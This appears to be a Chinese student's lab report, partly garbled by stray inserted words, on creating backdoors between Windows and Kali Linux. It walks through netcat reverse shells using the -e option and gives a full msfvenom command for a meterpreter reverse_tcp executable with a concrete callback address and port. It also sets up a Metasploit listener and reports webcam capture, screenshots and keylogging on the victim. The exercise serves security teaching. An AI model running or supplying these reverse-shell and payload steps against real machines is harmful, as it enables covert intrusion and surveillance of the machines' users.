Expert 2linux
學習內容:使用nc實現win,Linux間的後門鏈接 :meterpreter的應用 :MSF POST 模塊的應用 shell
學習目標:創建一個後門鏈接是如此的簡單,功能又如此強大。經過親手實踐並瞭解這一事實,從而提升本身的安全意識 。 windows
後門概念安全
後門就是不通過正常認證流程而訪問系統的通道。網絡
哪裏有後門呢?tcp
1編譯器留後門函數
2操做系統留後門學習
3最多見的固然仍是應用程序中留後門編碼
4還有就是潛伏於操做系統中或假裝爲特定應用的專用後門程序。spa
--
(實驗準備:
一、把虛擬機kali的網絡改成橋接
二、修改windows控制檯的編碼方式
法一:在cmd中輸入 CHCP 65001(臨時轉碼,不可永久)
法二:修改regedit註冊表
詳細操做見此地址:(百度的力量十分強大)https://blog.csdn.net/chy555chy/article/details/78355985
)
3、關掉防火牆與殺毒軟件
1、實驗內容
(一)Windows得到Linux Shell:
在Windows下,先使用ipconfig指令查看win10(物理機)
2、使用ncat.exe程序監聽本機的1120端口:
3、Kali:使用nc指令的-e選項反向鏈接Windows主機的1120端口
4、Windows下成功得到了一個Kali的shell,運行ls指令以下(此時沒有亂碼,這是爲啥要提早修改編碼方式UTF-8)
(二)、kali得到win10shell
先用 ifconfig 查看kali的IP地址
再用Linux監聽端口1120最後windows反彈鏈接kali
成功得到windows10的shell
(三)使用nc進行數據通訊,windows監聽端口1120,Linux反彈鏈接
輸入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.3.126 LPORT=1120
-f exe > 20151120_backdoor.exe 生成後門程序
在Linux上使用 msfconsle 指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口
設置完成後,執行監聽指令 exploit 。打開windows上的後門程序20151120_backdoor.exe。
能夠輸入指令遠程打開對方的攝像頭抓拍、截屏、擊鍵記錄、查看用戶等等
實驗結果以下
偷拍結果:
遠程截屏:
惡意程序攻入,綁定病毒
觸發系統函數從而啓動後門
3.Meterpreter有哪些給你映像深入的功能?
簡直事強大的太厲害了,能夠像搭積木同樣組裝攻擊模塊兒,能夠成爲批量攻擊的有利武器,爲此,感受網絡世界太危險。戰戰兢兢。之後要多學點知識。保護隱私。
4.如何發現本身有系統有沒有被安裝後門?
開開360、毒霸,看看有木有異常進程與不明代碼
5、實驗心得與體會
經過此次實驗讓我以爲原來黑客攻防是這個樣子,感受頗有趣,很好玩。